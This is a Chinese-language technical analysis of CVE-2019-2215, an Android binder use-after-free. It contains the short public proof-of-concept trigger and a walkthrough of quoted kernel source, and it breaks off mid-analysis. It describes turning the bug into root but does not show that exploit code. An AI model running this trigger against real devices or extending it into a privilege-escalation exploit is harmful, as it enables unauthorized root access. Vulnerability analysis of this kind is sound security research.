CVE-2019-2215

CVE-2019-2215

复现环境:android 10 kernel: Linux localhost 4.14.150+ arch:x86_64架构

exp只适用于x86(主要是在patch addr_limit上) 其他的架构要根据addr_limit在thread_info或是thread_struct的偏移修改.

漏洞简述

CVE-2019-2215是一个谷歌P0团队发现的与binder驱动相关的安卓内核UAF漏洞,配合内核信息泄漏可以实现任意地址读写,进而可以通过权限提升获取一个root权限的shell。

漏洞分析

主要来根据poc来说明漏洞及其触发

// poc.c — minimal trigger for CVE-2019-2215 (binder UAF).
// The original article's include lines were mangled by HTML extraction;
// restored here from the public Project Zero PoC.
#include <fcntl.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <unistd.h>

// ioctl command that frees the binder_thread for the calling thread.
#define BINDER_THREAD_EXIT 0x40046208ul

int main() {

    int fd, epfd;
    struct epoll_event event = {
  .events = EPOLLIN};

    fd = open("/dev/binder", O_RDONLY);          // allocates binder_proc
    epfd = epoll_create(1000);                   // allocates eventpoll
    epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);  // links epoll to binder_thread->wait
    ioctl(fd, BINDER_THREAD_EXIT, NULL);         // frees binder_thread (wait queue dies)
    epoll_ctl(epfd, EPOLL_CTL_DEL, fd, &event);  // unlink touches freed wait queue -> UAF
}

首先是第一句

 fd = open("/dev/binder", O_RDONLY);

具体调用的是binder_open

// drivers/android/binder.c 
/*
 * Quoted kernel excerpt (drivers/android/binder.c); [...] marks elided code.
 * open("/dev/binder") dispatches to binder_open via binder_fops.
 */
static const struct file_operations binder_fops = {
   
     [...]
     .open = binder_open,
     [...]
 };
/*
 * binder_open: allocates a zero-initialized binder_proc and stashes it in
 * filp->private_data, where later binder calls (e.g. binder_poll) retrieve it.
 */
static int binder_open(struct inode *nodp, struct file *filp)
 {
   
         struct binder_proc *proc;
         [...]
         proc = kzalloc(sizeof(*proc), GFP_KERNEL);
         if (proc == NULL)
                 return -ENOMEM;
         [...]
         filp->private_data = proc;
         [...]
         return 0;
 }

binder_open 通过 kzalloc 分配了一个 binder_proc 数据结构,并将其赋值给 filp->private_data

下一句 epoll是用来监控文件的

 epfd = epoll_create(1000);

看一下它的调用链

 /*
  * Quoted kernel excerpt: epoll_create only validates that size > 0 and
  * otherwise ignores it, delegating to epoll_create1(0).
  */
 SYSCALL_DEFINE1(epoll_create, int, size)
 {
   
         if (size <= 0)
                 return -EINVAL;
 
         return sys_epoll_create1(0);
 }

可以看出传递的参数没什么用,之后调用

/*
 * Quoted kernel excerpt ([...] = elided): allocates an eventpoll via
 * ep_alloc(), wraps it in an anonymous-inode file ("[eventpoll]"),
 * links ep->file, installs the fd and returns it.
 */
SYSCALL_DEFINE1(epoll_create1, int, flags)
 {
   
         int error, fd;
         struct eventpoll *ep = NULL;
         struct file *file;
         [...]
         error = ep_alloc(&ep);
         if (error < 0)
                 return error;
         [...]
         file = anon_inode_getfile("[eventpoll]", &eventpoll_fops, ep,
                                  O_RDWR | (flags & O_CLOEXEC));
         [...]
         ep->file = file;
         fd_install(fd, file);
         return fd;
         [...]
         return error;
 }

epoll_create1调用ep_alloc 之后设置ep->file = file 返回文件描述符fd,那重点我们关注ep_alloc

/*
 * Quoted kernel excerpt ([...] = elided): zero-allocates the eventpoll,
 * initializes the wq and poll_wait waitqueue heads (each becomes an empty
 * self-referencing circular list), the ready list, and the rbtree root.
 * The wq initialization matters for the UAF explained below.
 */
static int ep_alloc(struct eventpoll **pep)
 {
   
         int error;
         struct user_struct *user;
         struct eventpoll *ep;
         [...]
         ep = kzalloc(sizeof(*ep), GFP_KERNEL);
         [...]
         init_waitqueue_head(&ep->wq);
         init_waitqueue_head(&ep->poll_wait);
         INIT_LIST_HEAD(&ep->rdllist);
         ep->rbr = RB_ROOT_CACHED;
         [...]
         *pep = ep;
         return 0;
         [...]
         return error;
 }

因为涉及了较多 eventpoll 结构中的成员,下面给出 eventpoll 的结构定义加以说明

/*
 * Quoted kernel definition of struct eventpoll, shown for reference.
 * The wq and poll_wait waitqueue heads are the members initialized by
 * ep_alloc() above; rbr is the red-black tree of monitored fds that
 * ep_insert() links epitems into.
 */
struct eventpoll {
   
	/* Protect the access to this structure */
	spinlock_t lock;

	/*
	 * This mutex is used to ensure that files are not removed
	 * while epoll is using them. This is held during the event
	 * collection loop, the file cleanup path, the epoll file exit
	 * code and the ctl operations.
	 */
	struct mutex mtx;

	/* Wait queue used by sys_epoll_wait() */
	wait_queue_head_t wq;

	/* Wait queue used by file->poll() */
	wait_queue_head_t poll_wait;

	/* List of ready file descriptors */
	struct list_head rdllist;

	/* RB tree root used to store monitored fd structs */
	struct rb_root_cached rbr;

	/*
	 * This is a single linked list that chains all the "struct epitem" that
	 * happened while transferring ready events to userspace w/out
	 * holding ->lock.
	 */
	struct epitem *ovflist;

	/* wakeup_source used when ep_scan_ready_list is running */
	struct wakeup_source *ws;

	/* The user that created the eventpoll descriptor */
	struct user_struct *user;

	struct file *file;

	/* used to optimize loop detection check */
	int visited;
	struct list_head visited_list_link;

#ifdef CONFIG_NET_RX_BUSY_POLL
	/* used to track busy poll napi_id */
	unsigned int napi_id;
#endif
};

可以看出在 ep_alloc 中:分配 struct eventpoll,初始化等待队列 wq 和 poll_wait 成员,并初始化红黑树根 rbr 成员。其中 wq 是漏洞触发的关键,下面具体说明它是如何初始化的

这是wait_queue_head_t的结构

//include/linux/wait.h
// A waitqueue head: a spinlock followed by the list of waiters.
 struct __wait_queue_head {
   
	spinlock_t		lock; // the lock; not important here, but note it is 4 bytes wide
	struct list_head	task_list; // doubly linked list of waiters
};

// Circular doubly linked list node; an empty list has next and prev
// pointing back at the node itself.
struct list_head {
   
	struct list_head *next, *prev;};


这是init_waitqueue_head函数

#define init_waitqueue_head(q)				\
	do {
     						\
		static struct lock_class_key __key;	\
							\
		__init_waitqueue_head((q), #q, &__key);	\
	} while (0)
 
  __init_waitqueue_head(wait_queue_head_t *q, const char *name, struct lock_class_key *key)
{
   	spin_lock_init(&q->lock);
	lockdep_set_class_and_name(&q->lock, key, name);
	INIT_LIST_HEAD(&q->task_list);
}EXPORT_SYMBOL(__init_waitqueue_head);



/* Turn @list into an empty circular list: both links point back at the head. */
static inline void INIT_LIST_HEAD(struct list_head *list)
{
	list->prev = list;
	list->next = list;
}

![等待队列初始化示意图](wait.png)

首尾相连,在内存中表现是这样的,前一个是next,后一个是prev,就是指向它自己

![init_waitqueue_head 初始化后的内存布局](init_wq.png)

后面来看下一句

epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);
/*
 * Quoted kernel excerpt ([...] = elided): copies the epoll_event from
 * userspace, resolves epfd and the target fd to file pointers, fetches the
 * eventpoll from f.file->private_data, looks the fd up in the rbtree with
 * ep_find, and for EPOLL_CTL_ADD with no existing epitem calls ep_insert.
 */
SYSCALL_DEFINE4(epoll_ctl, int, epfd, int, op, int, fd,
                 struct epoll_event __user *, event)
 {
   
         int error;
         int full_check = 0;
         struct fd f, tf;
         struct eventpoll *ep;
         struct epitem *epi;
         struct epoll_event epds;
         struct eventpoll *tep = NULL;
 
         error = -EFAULT;
         if (ep_op_has_event(op) &&
             copy_from_user(&epds, event, sizeof(struct epoll_event)))
                 goto error_return;
 
         error = -EBADF;
         f = fdget(epfd);
         if (!f.file)
                 goto error_return;
 
         /* Get the "struct file *" for the target file */
         tf = fdget(fd);
         if (!tf.file)
                 goto error_fput;
         [...]
         ep = f.file->private_data;
         [...]
         epi = ep_find(ep, tf.file, fd);
 
         error = -EINVAL;
         switch (op) {
   
         case EPOLL_CTL_ADD:
                 if (!epi) {
   
                         epds.events |= POLLERR | POLLHUP;
                         error = ep_insert(ep, &epds, tf.file, fd, full_check);
                 } else
                         error = -EEXIST;
                 [...]
         [...]
         }
         [...]
         return error;
 }

将epoll_event结构从用户空间复制到内核空间

· 通过 fdget(epfd) 查找与 epoll 文件描述符对应的 file 指针

· 从该 file 的 private_data 成员中取得 eventpoll 结构指针

· 调用 ep_find,在 eventpoll 结构的红黑树中查找与目标 fd 匹配的 epitem 指针

· 如果找不到对应的 epitem,且操作为 EPOLL_CTL_ADD,则调用 ep_insert 分配一个 epitem 并将其链接到 eventpoll 结构的 rbr 成员(红黑树)上

接着来看一下ep_insert

 /*
  * Quoted kernel excerpt ([...] = elided): allocates and initializes an
  * epitem, binds it to the target file/fd via ep_set_ffd, registers the
  * ep_ptable_queue_proc callback in the poll table, polls the target file
  * via ep_item_poll (binder_poll for a binder fd), and finally links the
  * epitem into the eventpoll's red-black tree.
  */
 static int ep_insert(struct eventpoll *ep, struct epoll_event *event,
                      struct file *tfile, int fd, int full_check)
 {
   
         int error, revents, pwake = 0;
         unsigned long flags;
         long user_watches;
         struct epitem *epi;
         struct ep_pqueue epq;
         [...]
         if (!(epi = kmem_cache_alloc(epi_cache, GFP_KERNEL)))
                 return -ENOMEM;
 
         /* Item initialization follow here ... */
         INIT_LIST_HEAD(&epi->rdllink);
         INIT_LIST_HEAD(&epi->fllink);
         INIT_LIST_HEAD(&epi->pwqlist);
         epi->ep = ep;
         ep_set_ffd(&epi->ffd, tfile, fd);
         epi->event = *event;
         [...]
 
         /* Initialize the poll table using the queue callback */
         epq.epi = epi;
         init_poll_funcptr(&epq.pt, ep_ptable_queue_proc);
         [...]
         revents = ep_item_poll(epi, &epq.pt);
         [...]
         ep_rbtree_insert(ep, epi);
         [...]
         return 0;
         [...]
         return error;
 }

· 分配一个临时结构 ep_pqueue

· 分配epitem结构并将其初始化

· 初始化epi->pwqlist用于链接轮询等待队列的成员

· 通过调用 ep_set_ffd 设置 epitem 的 ffd 成员:ffd->file = file(在本例中即 binder 的 file 结构指针),ffd->fd = fd

· 设置epq.epi为epi指针

· 设置epq.pt->_qproc为ep_ptable_queue_proc 回调地址

· 调用ep_item_poll传递epi和epq.pt(轮询表)的地址作为参数

· 最后,通过调用 ep_rbtree_insert 将 epitem 链接到 eventpoll 结构的红黑树根节点上

让我们跟随ep_item_poll并找出它的作用。

 /*
  * Quoted kernel excerpt: invokes the monitored file's f_op->poll.
  * For the PoC's binder fd this dispatches to binder_poll.
  */
 static inline unsigned int ep_item_poll(struct epitem *epi, poll_table *pt)
 {
   
         pt->_key = epi->event.events;
 
         return epi->ffd.file->f_op->poll(epi->ffd.file, pt) & epi->event.events;
 }

这个就是调用binder_poll函数,在内存表现是这样的

(原文此处为三张内存布局插图,转载时未能保存)

接着查看binder_poll

 /*
  * Quoted kernel excerpt ([...] = elided): recovers the binder_proc from
  * filp->private_data, obtains (or creates) the calling thread's
  * binder_thread, then registers &thread->wait with poll_wait — linking
  * epoll's wait entry into memory owned by the binder_thread.
  */
 static unsigned int binder_poll(struct file *filp,
                                 struct poll_table_struct *wait)
 {
   
         struct binder_proc *proc = filp->private_data;
         struct binder_thread *thread = NULL;
         [...]
         thread = binder_get_thread(proc);
         if (!thread)
                 return POLLERR;
         [...]
         poll_wait(filp, &thread->wait, wait);
         [...]
         return 0;
 }

· 获取指向binder_proc结构的指针filp->private_data

· 调用binder_get_thread传递binder_proc结构的指针

· 最后调用 poll_wait,传入 binder 的 file 结构指针、&thread->wait(即 wait_queue_head_t 指针)和 poll_table_struct 指针

在其中binder_get_thread和 poll_wait是关键,我们先看一下binder_get_thread

 /*
  * Quoted kernel excerpt ([...] = elided): looks up the current thread's
  * binder_thread via binder_get_thread_ilocked; if none exists, zero-
  * allocates one and calls binder_get_thread_ilocked again to initialize
  * it and link it into proc->threads (a red-black tree).
  */
 static struct binder_thread *binder_get_thread(struct binder_proc *proc)
 {
   
         struct binder_thread *thread;
         struct binder_thread *new_thread;
         [...]
         thread = binder_get_thread_ilocked(proc, NULL);
         [...]
         if (!thread) {
   
                 new_thread = kzalloc(sizeof(*thread), GFP_KERNEL);
                 [...]
                 thread = binder_get_thread_ilocked(proc, new_thread);
                 [...]
         }
         return thread;
 }

· 首先调用 binder_get_thread_ilocked,尝试从 proc->threads.rb_node 红黑树中查找已有的 binder_thread

· 否则它分配一个binder_thread结构

· 最后binder_get_thread_ilocked再次调用,这将初始化新分配的binder_thread结构并将其链接到proc->threads.rb_node基本上是红黑树节点的成员

/*
 * Quoted kernel definition of struct binder_thread. The object freed by
 * BINDER_THREAD_EXIT is of this type; its embedded waitqueue head (wait)
 * is what epoll still points at after the free.
 */
struct binder_thread {
   
	struct binder_proc *proc;
	struct rb_node rb_node;
	struct list_head waiting_thread_node;
	int pid;
	int looper;              /* only modified by this thread */
	bool looper_need_return; /* can be written by other thread */
	struct binder_transaction *transaction_stack;
	struct list_head todo;
	bool process_todo;
	struct binder_error return_error;
	struct binder_error reply_error;
	wait_queue_head_t wait; // initialized the same way as eventpoll's waitqueues; this is the UAF trigger point
	struct binder_stats stats;
	atomic_t tmp_ref;
	bool is_dead;
	struct task_struct *task; // key field targeted by the exploit
};

在这里插入图片描述

对于poll_wait 它实际上调用的是ep_insert中初始化的ep_ptable_queue_proc,这里是uaf的第2个关键步骤

 static void ep_ptable_queue_proc(struct file *file, wait_queue_head_t *whead,
                  poll_table *pt)
 {
   
     struct epitem *epi = ep_item_from_epqueue(pt);
     struct eppoll_entry 
(原文在此处被截断:ep_ptable_queue_proc 的代码及其后的分析未完整保留;此后的内容为转载站点的付费/红包页面残留文本,与本文无关,已省略。)